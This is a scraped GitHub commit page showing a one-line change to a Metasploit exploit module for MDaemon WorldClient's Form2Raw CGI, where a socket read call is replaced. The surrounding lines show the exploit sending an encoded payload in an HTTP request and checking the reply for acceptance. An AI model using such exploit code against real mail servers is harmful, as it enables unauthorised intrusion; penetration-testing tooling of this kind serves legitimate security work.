We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 7f06d10 commit c8e44c3Copy full SHA for c8e44c3
modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb
@@ -90,7 +90,7 @@ def exploit
90
sploit << payload.encoded + " HTTP/1.0"
91
92
sock.put(sploit + "\r\n\r\n")
93
- res = sock.get(3,3)
+ res = sock.get_once(-1, 3)
94
95
if (res =~ /Message spooled but will be deleted if not FROM a valid account/)
96
print_status("Payload accepted by WorldClient Form2Raw CGI!")
0 commit comments